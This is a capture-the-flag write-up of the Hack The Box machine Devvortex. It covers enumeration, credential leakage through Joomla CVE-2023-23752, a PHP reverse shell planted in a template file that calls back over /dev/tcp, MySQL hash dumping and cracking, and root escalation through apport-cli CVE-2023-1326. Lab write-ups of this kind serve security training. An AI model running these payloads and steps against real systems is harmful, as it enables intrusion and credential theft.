🏴☠️HTB - Devvortex
p0db0t writeup of the easy-difficulty Linux machine Devvortex from https://hackthebox.eu
Enumeration Phase:
Nmap scan
First off, I started my enumeration with an Nmap scan of 10.10.11.242. The options I regularly use are: -sC is the equivalent to --script=default and runs a collection of Nmap enumeration scripts against the target, -sV does a service scan.
nmap -sC -sV 10.10.11.242
I added devvortex.htb to /etc/hosts next to the IP of the box which is 10.10.11.242
Since I still didn't have a way in, the next place to enumerate was HTTP on port 80. Navigating to http://devvortex.htb
Brute-force hidden directories:
After visiting http://devvortex.htb I decided to brute-force hidden directories with Gobuster and didn't find anything 😢
gobuster dir -u devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 200Subdomain enumeration:
I used also gobuster for this host Subdomain enumeration and found dev.devvortex.htb
gobuster vhost -u devvortex.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
I added dev.devvortex.htb to /etc/hosts next to the IP of the box which is 10.10.11.242
After visiting http://dev.devvortex.htb
Brute-force hidden directories:
I decided to brute-force hidden directories with Dirsearch and find /administrator/ and /Readme.txt 🎉
dirsearch -u dev.devvortex.htb
On the Administrator page, I found out that is the login page of Joomla CMS.
On the Readme.txt page, I found out the version of Joomla CMS 4.2.
Initial Foothold:
I found out that Joomla CMS 4.2 is Vulnerable to CVE-2023-23752 and used the tool Curl to get some sensitive information including the Username and Password of user Lewis. About CVE-2023-23752 more on this link:https://nvd.nist.gov/vuln/detail/CVE-2023-23752
curl -v 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true'
After login on to the Administrator page with credentials that I found with Curl, I edited error.php which was located at /template/Cassiopeia/error.php and set up reverse shell script.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.175/9001 0>&1'");
?>
I ran Netcat to listen to incoming connections and used Curl to trigger a reverse shell at the error.php page.
nc -lvnp 9001
curl http://dev.devvortex.htb/templates/cassiopeia/error.php
Boom! I got the shell as www-data
Owning User:
Credentials that I found with Curl have also a Database name so I went for MySQL checking.
mysql -u lewis -p
show databases;
use joomla
show tables;
select * from sd4fg_users;
Bingo 🎉 I found the hash of Lewis and saved the hash locally in a .txt file.
echo 'HASH' >> hash.txtI cracked the hash of Logan using the tool John The Ripper
sudo john --wordlist=/usr/share/wordlists/rockyou.txt --rules hash.txt
Sweet !!!! I log in as a user Logan via SSH.
ssh logan@devvortex.htb
Owning Root:
The sudo -l command gives me some interesting output
sudo -l
I found out that Apport-cli is Vulnerable to CVE-2023-1326 About CVE-2023-1326 more on this link: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023
sudo apport-cli -c /bin/mysql less
v
!
id
Last updated